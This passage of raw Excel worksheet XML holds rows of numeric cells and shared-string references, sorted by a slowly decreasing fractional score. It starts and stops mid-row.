      <c r="B24795" s="2">
        <v>3.8672131E7</v>
      </c>
      <c r="C24795" s="2" t="s">
        <v>23863</v>
      </c>
      <c r="D24795" s="2">
        <v>1.0</v>
      </c>
      <c r="E24795" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24795" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24796" ht="15.75" customHeight="1">
      <c r="A24796" s="1">
        <v>33449.0</v>
      </c>
      <c r="B24796" s="2">
        <v>7882855.0</v>
      </c>
      <c r="C24796" s="2" t="s">
        <v>23864</v>
      </c>
      <c r="D24796" s="2">
        <v>1.0</v>
      </c>
      <c r="E24796" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24796" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24797" ht="15.75" customHeight="1">
      <c r="A24797" s="1">
        <v>14118.0</v>
      </c>
      <c r="B24797" s="2">
        <v>3.7803455E7</v>
      </c>
      <c r="C24797" s="2" t="s">
        <v>23865</v>
      </c>
      <c r="D24797" s="2">
        <v>1.0</v>
      </c>
      <c r="E24797" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24797" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="24798" ht="15.75" customHeight="1">
      <c r="A24798" s="1">
        <v>22169.0</v>
      </c>
      <c r="B24798" s="2">
        <v>3.1612982E7</v>
      </c>
      <c r="C24798" s="2" t="s">
        <v>23866</v>
      </c>
      <c r="D24798" s="2">
        <v>1.0</v>
      </c>
      <c r="E24798" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24798" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="24799" ht="15.75" customHeight="1">
      <c r="A24799" s="1">
        <v>22959.0</v>
      </c>
      <c r="B24799" s="2">
        <v>4.9067639E7</v>
      </c>
      <c r="C24799" s="2" t="s">
        <v>23867</v>
      </c>
      <c r="D24799" s="2">
        <v>1.0</v>
      </c>
      <c r="E24799" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24799" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="24800" ht="15.75" customHeight="1">
      <c r="A24800" s="1">
        <v>975.0</v>
      </c>
      <c r="B24800" s="2">
        <v>2.2765351E7</v>
      </c>
      <c r="C24800" s="2" t="s">
        <v>23868</v>
      </c>
      <c r="D24800" s="2">
        <v>1.0</v>
      </c>
      <c r="E24800" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24800" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="24801" ht="15.75" customHeight="1">
      <c r="A24801" s="1">
        <v>29640.0</v>
      </c>
      <c r="B24801" s="2">
        <v>3.3798953E7</v>
      </c>
      <c r="C24801" s="2" t="s">
        <v>23869</v>
      </c>
      <c r="D24801" s="2">
        <v>1.0</v>
      </c>
      <c r="E24801" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24801" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="24802" ht="15.75" customHeight="1">
      <c r="A24802" s="1">
        <v>1801.0</v>
      </c>
      <c r="B24802" s="2">
        <v>2.9137578E7</v>
      </c>
      <c r="C24802" s="2" t="s">
        <v>23870</v>
      </c>
      <c r="D24802" s="2">
        <v>1.0</v>
      </c>
      <c r="E24802" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24802" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24803" ht="15.75" customHeight="1">
      <c r="A24803" s="1">
        <v>4006.0</v>
      </c>
      <c r="B24803" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C24803" s="2" t="s">
        <v>23871</v>
      </c>
      <c r="D24803" s="2">
        <v>1.0</v>
      </c>
      <c r="E24803" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24803" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24804" ht="15.75" customHeight="1">
      <c r="A24804" s="1">
        <v>7913.0</v>
      </c>
      <c r="B24804" s="2">
        <v>5.2494672E7</v>
      </c>
      <c r="C24804" s="2" t="s">
        <v>23872</v>
      </c>
      <c r="D24804" s="2">
        <v>1.0</v>
      </c>
      <c r="E24804" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24804" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24805" ht="15.75" customHeight="1">
      <c r="A24805" s="1">
        <v>16744.0</v>
      </c>
      <c r="B24805" s="2">
        <v>4.7568192E7</v>
      </c>
      <c r="C24805" s="2" t="s">
        <v>23873</v>
      </c>
      <c r="D24805" s="2">
        <v>1.0</v>
      </c>
      <c r="E24805" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24805" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24806" ht="15.75" customHeight="1">
      <c r="A24806" s="1">
        <v>20856.0</v>
      </c>
      <c r="B24806" s="2">
        <v>1.5780004E7</v>
      </c>
      <c r="C24806" s="2" t="s">
        <v>23874</v>
      </c>
      <c r="D24806" s="2">
        <v>1.0</v>
      </c>
      <c r="E24806" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24806" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24807" ht="15.75" customHeight="1">
      <c r="A24807" s="1">
        <v>21455.0</v>
      </c>
      <c r="B24807" s="2">
        <v>2.2653979E7</v>
      </c>
      <c r="C24807" s="2" t="s">
        <v>23875</v>
      </c>
      <c r="D24807" s="2">
        <v>1.0</v>
      </c>
      <c r="E24807" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24807" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24808" ht="15.75" customHeight="1">
      <c r="A24808" s="1">
        <v>26518.0</v>
      </c>
      <c r="B24808" s="2">
        <v>1.7634945E7</v>
      </c>
      <c r="C24808" s="2" t="s">
        <v>23876</v>
      </c>
      <c r="D24808" s="2">
        <v>1.0</v>
      </c>
      <c r="E24808" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24808" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24809" ht="15.75" customHeight="1">
      <c r="A24809" s="1">
        <v>30017.0</v>
      </c>
      <c r="B24809" s="2">
        <v>3616052.0</v>
      </c>
      <c r="C24809" s="2" t="s">
        <v>6788</v>
      </c>
      <c r="D24809" s="2">
        <v>1.0</v>
      </c>
      <c r="E24809" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24809" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24810" ht="15.75" customHeight="1">
      <c r="A24810" s="1">
        <v>31145.0</v>
      </c>
      <c r="B24810" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C24810" s="2" t="s">
        <v>23877</v>
      </c>
      <c r="D24810" s="2">
        <v>1.0</v>
      </c>
      <c r="E24810" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24810" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24811" ht="15.75" customHeight="1">
      <c r="A24811" s="1">
        <v>33216.0</v>
      </c>
      <c r="B24811" s="2">
        <v>7225817.0</v>
      </c>
      <c r="C24811" s="2" t="s">
        <v>23878</v>
      </c>
      <c r="D24811" s="2">
        <v>1.0</v>
      </c>
      <c r="E24811" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24811" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="24812" ht="15.75" customHeight="1">
      <c r="A24812" s="1">
        <v>807.0</v>
      </c>
      <c r="B24812" s="2">
        <v>2.1347598E7</v>
      </c>
      <c r="C24812" s="2" t="s">
        <v>23879</v>
      </c>
      <c r="D24812" s="2">
        <v>1.0</v>
      </c>
      <c r="E24812" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24812" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24813" ht="15.75" customHeight="1">
      <c r="A24813" s="1">
        <v>10653.0</v>
      </c>
      <c r="B24813" s="2">
        <v>1.4198991E7</v>
      </c>
      <c r="C24813" s="2" t="s">
        <v>23880</v>
      </c>
      <c r="D24813" s="2">
        <v>1.0</v>
      </c>
      <c r="E24813" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24813" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24814" ht="15.75" customHeight="1">
      <c r="A24814" s="1">
        <v>15216.0</v>
      </c>
      <c r="B24814" s="2">
        <v>4.2145884E7</v>
      </c>
      <c r="C24814" s="2" t="s">
        <v>23881</v>
      </c>
      <c r="D24814" s="2">
        <v>1.0</v>
      </c>
      <c r="E24814" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24814" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24815" ht="15.75" customHeight="1">
      <c r="A24815" s="1">
        <v>25872.0</v>
      </c>
      <c r="B24815" s="2">
        <v>1.4903974E7</v>
      </c>
      <c r="C24815" s="2" t="s">
        <v>23882</v>
      </c>
      <c r="D24815" s="2">
        <v>1.0</v>
      </c>
      <c r="E24815" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24815" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24816" ht="15.75" customHeight="1">
      <c r="A24816" s="1">
        <v>27600.0</v>
      </c>
      <c r="B24816" s="2">
        <v>2.259817E7</v>
      </c>
      <c r="C24816" s="2" t="s">
        <v>23883</v>
      </c>
      <c r="D24816" s="2">
        <v>1.0</v>
      </c>
      <c r="E24816" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24816" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24817" ht="15.75" customHeight="1">
      <c r="A24817" s="1">
        <v>31834.0</v>
      </c>
      <c r="B24817" s="2">
        <v>5.2641989E7</v>
      </c>
      <c r="C24817" s="2" t="s">
        <v>23884</v>
      </c>
      <c r="D24817" s="2">
        <v>1.0</v>
      </c>
      <c r="E24817" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24817" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24818" ht="15.75" customHeight="1">
      <c r="A24818" s="1">
        <v>33988.0</v>
      </c>
      <c r="B24818" s="2">
        <v>9404115.0</v>
      </c>
      <c r="C24818" s="2" t="s">
        <v>23885</v>
      </c>
      <c r="D24818" s="2">
        <v>1.0</v>
      </c>
      <c r="E24818" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24818" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="24819" ht="15.75" customHeight="1">
      <c r="A24819" s="1">
        <v>23858.0</v>
      </c>
      <c r="B24819" s="2">
        <v>8262947.0</v>
      </c>
      <c r="C24819" s="2" t="s">
        <v>23886</v>
      </c>
      <c r="D24819" s="2">
        <v>1.0</v>
      </c>
      <c r="E24819" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24819" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="24820" ht="15.75" customHeight="1">
      <c r="A24820" s="1">
        <v>13224.0</v>
      </c>
      <c r="B24820" s="2">
        <v>3.4229909E7</v>
      </c>
      <c r="C24820" s="2" t="s">
        <v>23887</v>
      </c>
      <c r="D24820" s="2">
        <v>1.0</v>
      </c>
      <c r="E24820" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24820" s="2">
        <v>0.107085346215781</v>
      </c>
    </row>
    <row r="24821" ht="15.75" customHeight="1">
      <c r="A24821" s="1">
        <v>28766.0</v>
      </c>
      <c r="B24821" s="2">
        <v>2.821584E7</v>
      </c>
      <c r="C24821" s="2" t="s">
        <v>23888</v>
      </c>
      <c r="D24821" s="2">
        <v>1.0</v>
      </c>
      <c r="E24821" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24821" s="2">
        <v>0.1069651741293533</v>
      </c>
    </row>
    <row r="24822" ht="15.75" customHeight="1">
      <c r="A24822" s="1">
        <v>26797.0</v>
      </c>
      <c r="B24822" s="2">
        <v>1.8641667E7</v>
      </c>
      <c r="C24822" s="2" t="s">
        <v>23889</v>
      </c>
      <c r="D24822" s="2">
        <v>1.0</v>
      </c>
      <c r="E24822" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24822" s="2">
        <v>0.1067019400352734</v>
      </c>
    </row>
    <row r="24823" ht="15.75" customHeight="1">
      <c r="A24823" s="1">
        <v>32485.0</v>
      </c>
      <c r="B24823" s="2">
        <v>5.7000339E7</v>
      </c>
      <c r="C24823" s="2" t="s">
        <v>23890</v>
      </c>
      <c r="D24823" s="2">
        <v>1.0</v>
      </c>
      <c r="E24823" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24823" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="24824" ht="15.75" customHeight="1">
      <c r="A24824" s="1">
        <v>32753.0</v>
      </c>
      <c r="B24824" s="2">
        <v>6053782.0</v>
      </c>
      <c r="C24824" s="2" t="s">
        <v>23891</v>
      </c>
      <c r="D24824" s="2">
        <v>1.0</v>
      </c>
      <c r="E24824" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24824" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="24825" ht="15.75" customHeight="1">
      <c r="A24825" s="1">
        <v>82.0</v>
      </c>
      <c r="B24825" s="2">
        <v>1.1907027E7</v>
      </c>
      <c r="C24825" s="2" t="s">
        <v>23892</v>
      </c>
      <c r="D24825" s="2">
        <v>1.0</v>
      </c>
      <c r="E24825" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24825" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="24826" ht="15.75" customHeight="1">
      <c r="A24826" s="1">
        <v>20947.0</v>
      </c>
      <c r="B24826" s="2">
        <v>1.6594889E7</v>
      </c>
      <c r="C24826" s="2" t="s">
        <v>23893</v>
      </c>
      <c r="D24826" s="2">
        <v>1.0</v>
      </c>
      <c r="E24826" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24826" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="24827" ht="15.75" customHeight="1">
      <c r="A24827" s="1">
        <v>31514.0</v>
      </c>
      <c r="B24827" s="2">
        <v>5076272.0</v>
      </c>
      <c r="C24827" s="2" t="s">
        <v>23894</v>
      </c>
      <c r="D24827" s="2">
        <v>1.0</v>
      </c>
      <c r="E24827" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24827" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="24828" ht="15.75" customHeight="1">
      <c r="A24828" s="1">
        <v>9647.0</v>
      </c>
      <c r="B24828" s="2">
        <v>5.625871E7</v>
      </c>
      <c r="C24828" s="2" t="s">
        <v>23895</v>
      </c>
      <c r="D24828" s="2">
        <v>1.0</v>
      </c>
      <c r="E24828" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24828" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="24829" ht="15.75" customHeight="1">
      <c r="A24829" s="1">
        <v>25899.0</v>
      </c>
      <c r="B24829" s="2">
        <v>1.5035155E7</v>
      </c>
      <c r="C24829" s="2" t="s">
        <v>23896</v>
      </c>
      <c r="D24829" s="2">
        <v>1.0</v>
      </c>
      <c r="E24829" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24829" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="24830" ht="15.75" customHeight="1">
      <c r="A24830" s="1">
        <v>29096.0</v>
      </c>
      <c r="B24830" s="2">
        <v>3.0392336E7</v>
      </c>
      <c r="C24830" s="2" t="s">
        <v>23897</v>
      </c>
      <c r="D24830" s="2">
        <v>1.0</v>
      </c>
      <c r="E24830" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24830" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="24831" ht="15.75" customHeight="1">
      <c r="A24831" s="1">
        <v>29132.0</v>
      </c>
      <c r="B24831" s="2">
        <v>3.052636E7</v>
      </c>
      <c r="C24831" s="2" t="s">
        <v>23897</v>
      </c>
      <c r="D24831" s="2">
        <v>1.0</v>
      </c>
      <c r="E24831" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24831" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="24832" ht="15.75" customHeight="1">
      <c r="A24832" s="1">
        <v>1986.0</v>
      </c>
      <c r="B24832" s="2">
        <v>3.0487827E7</v>
      </c>
      <c r="C24832" s="2" t="s">
        <v>23898</v>
      </c>
      <c r="D24832" s="2">
        <v>1.0</v>
      </c>
      <c r="E24832" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24832" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24833" ht="15.75" customHeight="1">
      <c r="A24833" s="1">
        <v>3007.0</v>
      </c>
      <c r="B24833" s="2">
        <v>3.6338448E7</v>
      </c>
      <c r="C24833" s="2" t="s">
        <v>23899</v>
      </c>
      <c r="D24833" s="2">
        <v>1.0</v>
      </c>
      <c r="E24833" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24833" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24834" ht="15.75" customHeight="1">
      <c r="A24834" s="1">
        <v>3361.0</v>
      </c>
      <c r="B24834" s="2">
        <v>3.7855737E7</v>
      </c>
      <c r="C24834" s="2" t="s">
        <v>23900</v>
      </c>
      <c r="D24834" s="2">
        <v>1.0</v>
      </c>
      <c r="E24834" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24834" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24835" ht="15.75" customHeight="1">
      <c r="A24835" s="1">
        <v>4265.0</v>
      </c>
      <c r="B24835" s="2">
        <v>4.18555E7</v>
      </c>
      <c r="C24835" s="2" t="s">
        <v>23901</v>
      </c>
      <c r="D24835" s="2">
        <v>1.0</v>
      </c>
      <c r="E24835" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24835" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24836" ht="15.75" customHeight="1">
      <c r="A24836" s="1">
        <v>8503.0</v>
      </c>
      <c r="B24836" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C24836" s="2" t="s">
        <v>23902</v>
      </c>
      <c r="D24836" s="2">
        <v>1.0</v>
      </c>
      <c r="E24836" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24836" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24837" ht="15.75" customHeight="1">
      <c r="A24837" s="1">
        <v>10498.0</v>
      </c>
      <c r="B24837" s="2">
        <v>1.1346658E7</v>
      </c>
      <c r="C24837" s="2" t="s">
        <v>23903</v>
      </c>
      <c r="D24837" s="2">
        <v>1.0</v>
      </c>
      <c r="E24837" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24837" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24838" ht="15.75" customHeight="1">
      <c r="A24838" s="1">
        <v>10796.0</v>
      </c>
      <c r="B24838" s="2">
        <v>1.5734323E7</v>
      </c>
      <c r="C24838" s="2" t="s">
        <v>23904</v>
      </c>
      <c r="D24838" s="2">
        <v>1.0</v>
      </c>
      <c r="E24838" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24838" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24839" ht="15.75" customHeight="1">
      <c r="A24839" s="1">
        <v>12992.0</v>
      </c>
      <c r="B24839" s="2">
        <v>3.2744054E7</v>
      </c>
      <c r="C24839" s="2" t="s">
        <v>23905</v>
      </c>
      <c r="D24839" s="2">
        <v>1.0</v>
      </c>
      <c r="E24839" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24839" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24840" ht="15.75" customHeight="1">
      <c r="A24840" s="1">
        <v>13894.0</v>
      </c>
      <c r="B24840" s="2">
        <v>3.7033913E7</v>
      </c>
      <c r="C24840" s="2" t="s">
        <v>23906</v>
      </c>
      <c r="D24840" s="2">
        <v>1.0</v>
      </c>
      <c r="E24840" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24840" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24841" ht="15.75" customHeight="1">
      <c r="A24841" s="1">
        <v>16664.0</v>
      </c>
      <c r="B24841" s="2">
        <v>4.7252241E7</v>
      </c>
      <c r="C24841" s="2" t="s">
        <v>23907</v>
      </c>
      <c r="D24841" s="2">
        <v>1.0</v>
      </c>
      <c r="E24841" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24841" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24842" ht="15.75" customHeight="1">
      <c r="A24842" s="1">
        <v>17439.0</v>
      </c>
      <c r="B24842" s="2">
        <v>4.9747906E7</v>
      </c>
      <c r="C24842" s="2" t="s">
        <v>23908</v>
      </c>
      <c r="D24842" s="2">
        <v>1.0</v>
      </c>
      <c r="E24842" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24842" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24843" ht="15.75" customHeight="1">
      <c r="A24843" s="1">
        <v>20736.0</v>
      </c>
      <c r="B24843" s="2">
        <v>1.4748082E7</v>
      </c>
      <c r="C24843" s="2" t="s">
        <v>23909</v>
      </c>
      <c r="D24843" s="2">
        <v>1.0</v>
      </c>
      <c r="E24843" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24843" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24844" ht="15.75" customHeight="1">
      <c r="A24844" s="1">
        <v>26632.0</v>
      </c>
      <c r="B24844" s="2">
        <v>1.8043994E7</v>
      </c>
      <c r="C24844" s="2" t="s">
        <v>23910</v>
      </c>
      <c r="D24844" s="2">
        <v>1.0</v>
      </c>
      <c r="E24844" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24844" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24845" ht="15.75" customHeight="1">
      <c r="A24845" s="1">
        <v>27104.0</v>
      </c>
      <c r="B24845" s="2">
        <v>2.0547628E7</v>
      </c>
      <c r="C24845" s="2" t="s">
        <v>23911</v>
      </c>
      <c r="D24845" s="2">
        <v>1.0</v>
      </c>
      <c r="E24845" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24845" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24846" ht="15.75" customHeight="1">
      <c r="A24846" s="1">
        <v>29511.0</v>
      </c>
      <c r="B24846" s="2">
        <v>3.2761843E7</v>
      </c>
      <c r="C24846" s="2" t="s">
        <v>23912</v>
      </c>
      <c r="D24846" s="2">
        <v>1.0</v>
      </c>
      <c r="E24846" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24846" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24847" ht="15.75" customHeight="1">
      <c r="A24847" s="1">
        <v>30157.0</v>
      </c>
      <c r="B24847" s="2">
        <v>3.7045725E7</v>
      </c>
      <c r="C24847" s="2" t="s">
        <v>23913</v>
      </c>
      <c r="D24847" s="2">
        <v>1.0</v>
      </c>
      <c r="E24847" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24847" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24848" ht="15.75" customHeight="1">
      <c r="A24848" s="1">
        <v>31968.0</v>
      </c>
      <c r="B24848" s="2">
        <v>5314854.0</v>
      </c>
      <c r="C24848" s="2" t="s">
        <v>23914</v>
      </c>
      <c r="D24848" s="2">
        <v>1.0</v>
      </c>
      <c r="E24848" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24848" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24849" ht="15.75" customHeight="1">
      <c r="A24849" s="1">
        <v>32127.0</v>
      </c>
      <c r="B24849" s="2">
        <v>5.4113315E7</v>
      </c>
      <c r="C24849" s="2" t="s">
        <v>23915</v>
      </c>
      <c r="D24849" s="2">
        <v>1.0</v>
      </c>
      <c r="E24849" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24849" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24850" ht="15.75" customHeight="1">
      <c r="A24850" s="1">
        <v>32486.0</v>
      </c>
      <c r="B24850" s="2">
        <v>5.7000339E7</v>
      </c>
      <c r="C24850" s="2" t="s">
        <v>23916</v>
      </c>
      <c r="D24850" s="2">
        <v>1.0</v>
      </c>
      <c r="E24850" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24850" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24851" ht="15.75" customHeight="1">
      <c r="A24851" s="1">
        <v>33440.0</v>
      </c>
      <c r="B24851" s="2">
        <v>7846151.0</v>
      </c>
      <c r="C24851" s="2" t="s">
        <v>23917</v>
      </c>
      <c r="D24851" s="2">
        <v>1.0</v>
      </c>
      <c r="E24851" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24851" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="24852" ht="15.75" customHeight="1">
      <c r="A24852" s="1">
        <v>11355.0</v>
      </c>
      <c r="B24852" s="2">
        <v>2.1312042E7</v>
      </c>
      <c r="C24852" s="2" t="s">
        <v>23918</v>
      </c>
      <c r="D24852" s="2">
        <v>1.0</v>
      </c>
      <c r="E24852" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24852" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24853" ht="15.75" customHeight="1">
      <c r="A24853" s="1">
        <v>14755.0</v>
      </c>
      <c r="B24853" s="2">
        <v>4.079527E7</v>
      </c>
      <c r="C24853" s="2" t="s">
        <v>23919</v>
      </c>
      <c r="D24853" s="2">
        <v>1.0</v>
      </c>
      <c r="E24853" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24853" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24854" ht="15.75" customHeight="1">
      <c r="A24854" s="1">
        <v>21181.0</v>
      </c>
      <c r="B24854" s="2">
        <v>1.9192318E7</v>
      </c>
      <c r="C24854" s="2" t="s">
        <v>23920</v>
      </c>
      <c r="D24854" s="2">
        <v>1.0</v>
      </c>
      <c r="E24854" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24854" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24855" ht="15.75" customHeight="1">
      <c r="A24855" s="1">
        <v>22942.0</v>
      </c>
      <c r="B24855" s="2">
        <v>4.8851451E7</v>
      </c>
      <c r="C24855" s="2" t="s">
        <v>23921</v>
      </c>
      <c r="D24855" s="2">
        <v>1.0</v>
      </c>
      <c r="E24855" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24855" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24856" ht="15.75" customHeight="1">
      <c r="A24856" s="1">
        <v>31336.0</v>
      </c>
      <c r="B24856" s="2">
        <v>4.9781659E7</v>
      </c>
      <c r="C24856" s="2" t="s">
        <v>23922</v>
      </c>
      <c r="D24856" s="2">
        <v>1.0</v>
      </c>
      <c r="E24856" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24856" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24857" ht="15.75" customHeight="1">
      <c r="A24857" s="1">
        <v>31859.0</v>
      </c>
      <c r="B24857" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C24857" s="2" t="s">
        <v>23923</v>
      </c>
      <c r="D24857" s="2">
        <v>1.0</v>
      </c>
      <c r="E24857" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24857" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24858" ht="15.75" customHeight="1">
      <c r="A24858" s="1">
        <v>32963.0</v>
      </c>
      <c r="B24858" s="2">
        <v>6518102.0</v>
      </c>
      <c r="C24858" s="2" t="s">
        <v>23924</v>
      </c>
      <c r="D24858" s="2">
        <v>1.0</v>
      </c>
      <c r="E24858" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24858" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="24859" ht="15.75" customHeight="1">
      <c r="A24859" s="1">
        <v>5091.0</v>
      </c>
      <c r="B24859" s="2">
        <v>4.4483401E7</v>
      </c>
      <c r="C24859" s="2" t="s">
        <v>23925</v>
      </c>
      <c r="D24859" s="2">
        <v>1.0</v>
      </c>
      <c r="E24859" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24859" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="24860" ht="15.75" customHeight="1">
      <c r="A24860" s="1">
        <v>13837.0</v>
      </c>
      <c r="B24860" s="2">
        <v>3.6780872E7</v>
      </c>
      <c r="C24860" s="2" t="s">
        <v>23926</v>
      </c>
      <c r="D24860" s="2">
        <v>1.0</v>
      </c>
      <c r="E24860" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24860" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="24861" ht="15.75" customHeight="1">
      <c r="A24861" s="1">
        <v>11029.0</v>
      </c>
      <c r="B24861" s="2">
        <v>1.7934584E7</v>
      </c>
      <c r="C24861" s="2" t="s">
        <v>23927</v>
      </c>
      <c r="D24861" s="2">
        <v>1.0</v>
      </c>
      <c r="E24861" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24861" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24862" ht="15.75" customHeight="1">
      <c r="A24862" s="1">
        <v>12031.0</v>
      </c>
      <c r="B24862" s="2">
        <v>2.6224945E7</v>
